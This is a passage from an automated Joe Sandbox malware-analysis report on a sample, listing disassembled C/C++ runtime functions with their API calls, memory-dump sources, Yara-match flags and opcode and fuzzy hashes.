                                                      • Opcode Fuzzy Hash: 9bbf6c831fd912da87baf57c36a4887fcd0ef6c58bda06b470faafc8a7fe9ad1
                                                      • Instruction Fuzzy Hash: 4C218671C04359AAEF11FBB8D844BDD77F8AF09319F14401EE410B7281FB75A9448B69
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00428DE1,00426772,004406B0,00000008,00440A15,?,?,?,?,00423A5B,?,?,3131EDE3), ref: 00428DF8
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E06
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E1F
                                                      • SetLastError.KERNEL32(00000000,?,00428DE1,00426772,004406B0,00000008,00440A15,?,?,?,?,00423A5B,?,?,3131EDE3), ref: 00428E71
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                      • Instruction ID: 7ad4f0df2e9502dcbdb31cfe788d2cf5650d8737248d5a652805d173a05f68b7
                                                      • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                      • Instruction Fuzzy Hash: 5A01283230A7316EA6242BF57C8952F2744EB15B79B60033FF510903E2EE194C21954D
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,046F9048,046F69D9,04710917,00000008,04710C7C,?,?,?,?,046F3CC2,?,?,0045A064), ref: 046F905F
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 046F906D
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 046F9086
                                                      • SetLastError.KERNEL32(00000000,?,046F9048,046F69D9,04710917,00000008,04710C7C,?,?,?,?,046F3CC2,?,?,0045A064), ref: 046F90D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                      • Instruction ID: 242861dd73e770d2cfd2408ef551b67792f7009f8126331dc4079bff31317f42
                                                      • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                      • Instruction Fuzzy Hash: AF01F7723097116EB7342BF5BC88A262744EB05779B20033EEBA4453E1FF12A819555D
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404D79
                                                      • int.LIBCPMT ref: 00404D90
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404D99
                                                      • std::_Facet_Register.LIBCPMT ref: 00404DCA
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DE0
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: dc8cc55967415f6a0fc2e567eb5e501cce76001588e3bd73c4b830a1ca651174
                                                      • Instruction ID: efd59a8a4ce5531e7078d737fa0b9be6b6b0d650fdb19138902b4e8de58bbbfd
                                                      • Opcode Fuzzy Hash: dc8cc55967415f6a0fc2e567eb5e501cce76001588e3bd73c4b830a1ca651174
                                                      • Instruction Fuzzy Hash: DF119E719101189BCB15EBA1C841AEE7774AF80319F14053FE5127B2D2DB3C9A05CB9D
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 046D4FE0
                                                      • int.LIBCPMT ref: 046D4FF7
                                                        • Part of subcall function 046DBFD9: std::_Lockit::_Lockit.LIBCPMT ref: 046DBFEA
                                                        • Part of subcall function 046DBFD9: std::_Lockit::~_Lockit.LIBCPMT ref: 046DC004
                                                      • std::locale::_Getfacet.LIBCPMT ref: 046D5000
                                                      • std::_Facet_Register.LIBCPMT ref: 046D5031
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 046D5047
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046D5065
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: dc8cc55967415f6a0fc2e567eb5e501cce76001588e3bd73c4b830a1ca651174
                                                      • Instruction ID: ab5a82a05ff0c39401192e058ce0ba7530737879e959cf2d24eec9387fa65bb0
                                                      • Opcode Fuzzy Hash: dc8cc55967415f6a0fc2e567eb5e501cce76001588e3bd73c4b830a1ca651174
                                                      • Instruction Fuzzy Hash: F311AC32D00228ABEF25EFA0C800AED77A4AF54719F14451DE512AB290FB75BA05C799
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1B0
                                                      • int.LIBCPMT ref: 0040C1C7
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040C1D0
                                                      • std::_Facet_Register.LIBCPMT ref: 0040C201
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C217
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C235
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 4e80590c1daf506508f86de39c45a2fb5ed31c353484bd1e4201b59de41cb253
                                                      • Instruction ID: 6b19aca16b5ee2806017c598a5a39285e5846dd85c5abd501d9917ceab81d603
                                                      • Opcode Fuzzy Hash: 4e80590c1daf506508f86de39c45a2fb5ed31c353484bd1e4201b59de41cb253
                                                      • Instruction Fuzzy Hash: E5117031D00219DBCB14EBE1D881AED7764AF54319F10053FE816BB2D2DB7C9A04CBA9
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004054F9
                                                      • int.LIBCPMT ref: 00405510
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00405519
                                                      • std::_Facet_Register.LIBCPMT ref: 0040554A
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00405560
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040557E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: b413353ca2cb88eb9f67ed3830c99794481aa72321bd8bdc3f632fee9d19e997
                                                      • Instruction ID: 51f3cbdd7a3cb2d943171398e4bd9eec0edb2b0c3dc28ea11f947fcb10585dfd
                                                      • Opcode Fuzzy Hash: b413353ca2cb88eb9f67ed3830c99794481aa72321bd8bdc3f632fee9d19e997
                                                      • Instruction Fuzzy Hash: 3411A032D00618ABCB10EBA5CC41AAE7770EF44319F14053EE411BB2D2EB3C9E04CB98
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00405595
                                                      • int.LIBCPMT ref: 004055AC
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 004055B5
                                                      • std::_Facet_Register.LIBCPMT ref: 004055E6
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004055FC
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040561A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 253da7def748f873aa858a5abf55e007f795de8dc7edc342c631e395e77fcb7b
                                                      • Instruction ID: 8bd0dacbe2200d0edaf670a3e4ad6e2c10e3f5b07ea158c040a2e50667d2dda9
                                                      • Opcode Fuzzy Hash: 253da7def748f873aa858a5abf55e007f795de8dc7edc342c631e395e77fcb7b
                                                      • Instruction Fuzzy Hash: D8115E719006199ACB14EBA1D841AAE7775EF44315F14053FE812BB2D2DB7C9A05CB9C
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404C3B
                                                      • int.LIBCPMT ref: 00404C52
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404C5B
                                                      • std::_Facet_Register.LIBCPMT ref: 00404C8C
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CA2
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 7cea1ae87beee365840d254f86f45c8b09256443204a8f66795a0fae7c1c3cf5
                                                      • Instruction ID: c9b89b989855d4c571325bf02331e014af237f7f7f330d53573bd89ddfaab51b
                                                      • Opcode Fuzzy Hash: 7cea1ae87beee365840d254f86f45c8b09256443204a8f66795a0fae7c1c3cf5
                                                      • Instruction Fuzzy Hash: 0B118271D002299BCB14EBA1C845AEE7774AF84319F11053FE515BB2D2DB7C9E04CB99
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 046DC417
                                                      • int.LIBCPMT ref: 046DC42E
                                                        • Part of subcall function 046DBFD9: std::_Lockit::_Lockit.LIBCPMT ref: 046DBFEA
                                                        • Part of subcall function 046DBFD9: std::_Lockit::~_Lockit.LIBCPMT ref: 046DC004
                                                      • std::locale::_Getfacet.LIBCPMT ref: 046DC437
                                                      • std::_Facet_Register.LIBCPMT ref: 046DC468
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 046DC47E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046DC49C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 4e80590c1daf506508f86de39c45a2fb5ed31c353484bd1e4201b59de41cb253
                                                      • Instruction ID: 0bdf51463c87e281c8c6c6b190bead12f1b841e9496c83f756da9fefdb28b38c
                                                      • Opcode Fuzzy Hash: 4e80590c1daf506508f86de39c45a2fb5ed31c353484bd1e4201b59de41cb253
                                                      • Instruction Fuzzy Hash: D6118B72D0022DABEB15EBA4C840AFD7764AF44718F24451DE512BB290FF74AA01C7A9
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 046D4EA2
                                                      • int.LIBCPMT ref: 046D4EB9
                                                        • Part of subcall function 046DBFD9: std::_Lockit::_Lockit.LIBCPMT ref: 046DBFEA
                                                        • Part of subcall function 046DBFD9: std::_Lockit::~_Lockit.LIBCPMT ref: 046DC004
                                                      • std::locale::_Getfacet.LIBCPMT ref: 046D4EC2
                                                      • std::_Facet_Register.LIBCPMT ref: 046D4EF3
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 046D4F09
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046D4F27
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: 7cea1ae87beee365840d254f86f45c8b09256443204a8f66795a0fae7c1c3cf5
                                                      • Instruction ID: 04ebbb4c7a2079464db03613354312b8b74ff91b9ab583cdfef103c37f0eb4ab
                                                      • Opcode Fuzzy Hash: 7cea1ae87beee365840d254f86f45c8b09256443204a8f66795a0fae7c1c3cf5
                                                      • Instruction Fuzzy Hash: 8A11A172D00229ABEF25EFA0C840AED77B4AF94719F14051DE511AB2A0FF74BE00C799
                                                      APIs
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 046F897A
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 046F8A33
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: "1@$0fB$csm
                                                      • API String ID: 3480331319-3151313498
                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction ID: 06c3bfcb457ba7c5b8f7ee052020dd0d4de7bd4b15a17621a175367a85838f28
                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                      • Instruction Fuzzy Hash: 4341C630A00208ABCF10EF6CCC45A9E7BB5FF4532CF1481A5EA956B391E736B955CB91
                                                      APIs
                                                      • SetEvent.KERNEL32(?,00000000), ref: 00423749
                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423731
                                                        • Part of subcall function 0041B73C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B75D
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042377A
                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237A3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                      • String ID: "1@
                                                      • API String ID: 2630251706-1946750398
                                                      • Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                      • Instruction ID: 26d67dbd1ca29f509460887b03f845c7b7553e0c5ff7feafc1e4fad03756b5e5
                                                      • Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
                                                      • Instruction Fuzzy Hash: B9110B747002106BCF04AF25DC85DAE7779EB84761B10407BFA06D7392CBBC9D41CA98
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00404E80
                                                        • Part of subcall function 0040BB5D: __EH_prolog3_GS.LIBCMT ref: 0040BB64
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404ECB
                                                      • __Getcoll.LIBCPMT ref: 00404EDA
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID: |J@
                                                      • API String ID: 1836011271-3739266617
                                                      • Opcode ID: 15df9f408afb62f81537008e8a835d3397b07670a6045ba689dee2ca7154d090
                                                      • Instruction ID: c20a3fbba19ef514f93e81f5f78b79826858263dd1e821b9b3bc98d3226dc2c7
                                                      • Opcode Fuzzy Hash: 15df9f408afb62f81537008e8a835d3397b07670a6045ba689dee2ca7154d090
                                                      • Instruction Fuzzy Hash: 67016971910209EFDB10EFA5D441B9DB7B0BF44319F10853EE455BB6C2CB789544CB99
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE31
                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE55
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE68
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE76
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler
                                                      • API String ID: 3657713681-923244539
                                                      • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                      • Instruction ID: c60aa93a39525c790efe6095f81eaebe2eb2d525de7270d8979a73265dec8ac3
                                                      • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                      • Instruction Fuzzy Hash: 6FF05931940708A7C724F745DC928DEB3799E91B18760812FE44663282DB3CA98AC69D
                                                      APIs
                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E64F
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E662
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E670
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID: "1@$pContext
                                                      • API String ID: 1990795212-994062807
                                                      • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                      • Instruction ID: 8fdd528e8ddf74d56289c82c300dd76b8c64187c2a6bd7ebcd67f626c0161db6
                                                      • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                      • Instruction Fuzzy Hash: FCE0D139B0011457CB04F769DC06C5DB7A9EED0714754406BF915A3341DFBCA905C5D8
                                                      APIs
                                                      • Concurrency::critical_section::unlock.LIBCMT ref: 00411EAC
                                                        • Part of subcall function 00411122: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411143
                                                        • Part of subcall function 00411122: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041117A
                                                        • Part of subcall function 00411122: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411186
                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EB8
                                                        • Part of subcall function 00410A93: Concurrency::critical_section::unlock.LIBCMT ref: 00410AB7
                                                      • Concurrency::Context::Block.LIBCONCRT ref: 00411EBD
                                                        • Part of subcall function 00412C71: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C73
                                                      • Concurrency::critical_section::lock.LIBCONCRT ref: 00411EDD
                                                        • Part of subcall function 0041104B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411059
                                                        • Part of subcall function 0041104B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411066
                                                        • Part of subcall function 0041104B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411071
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                      • String ID: "1@
                                                      • API String ID: 3659872527-1946750398
                                                      • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                      • Instruction ID: 469d0f8320c442117f3d3686e23671eaf8242e5923029cf1daa93514d1604d3f
                                                      • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                      • Instruction Fuzzy Hash: 53E0D8345005025BCB04FB21C4515DCFB617F95314B10421EE462032E1CF7C5D86CB88
                                                      APIs
                                                      • Concurrency::critical_section::unlock.LIBCMT ref: 046E2113
                                                        • Part of subcall function 046E1389: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 046E13AA
                                                        • Part of subcall function 046E1389: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 046E13E1
                                                        • Part of subcall function 046E1389: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 046E13ED
                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 046E211F
                                                        • Part of subcall function 046E0CFA: Concurrency::critical_section::unlock.LIBCMT ref: 046E0D1E
                                                      • Concurrency::Context::Block.LIBCONCRT ref: 046E2124
                                                        • Part of subcall function 046E2ED8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 046E2EDA
                                                      • Concurrency::critical_section::lock.LIBCONCRT ref: 046E2144
                                                        • Part of subcall function 046E12B2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 046E12C0
                                                        • Part of subcall function 046E12B2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 046E12CD
                                                        • Part of subcall function 046E12B2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 046E12D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                      • String ID: "1@
                                                      • API String ID: 3659872527-1946750398
                                                      • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                      • Instruction ID: dc56649033674a39e7bd60be7073ff85be17b9c92b7c7dd7ebf3f6486bc298d8
                                                      • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                      • Instruction Fuzzy Hash: 99E01A355025169BDB08FB21C8605ACBBA2BF85314B14424994A6472E0EF747A86DB89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                      • Instruction ID: 5a01cb2bda703cc323e430b932663db35aaad4c657ba87df4bbdda35476bab91
                                                      • Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                      • Instruction Fuzzy Hash: F0719031B00266DBCB21CF95E884ABFBB75FF41360B98426BE81197290DB749D41C7E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                      • Instruction ID: 6561c049650afe59ae27dcdb076abca19cbc93dda18cc07458b692b79cd831c7
                                                      • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                      • Instruction Fuzzy Hash: E171C775A002169BDB21CF58CC84ABFBB76FF55B10F144229E691A7290F774BD41CBA0
                                                      APIs
                                                        • Part of subcall function 004336B7: RtlAllocateHeap.NTDLL(00000000,0040D886,00000000,?,004267AE,00000002,00000000,00000000,00000000,?,0040CD37,0040D886,00000004,00000000,00000000,00000000), ref: 004336E9
                                                      • _free.LIBCMT ref: 00430B5F
                                                      • _free.LIBCMT ref: 00430B76
                                                      • _free.LIBCMT ref: 00430B95
                                                      • _free.LIBCMT ref: 00430BB0
                                                      • _free.LIBCMT ref: 00430BC7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3033488037-0
                                                      • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                      • Instruction ID: fa2a1e89913973176317e453863384d053ae921997245dbad48486a05003b7a1
                                                      • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
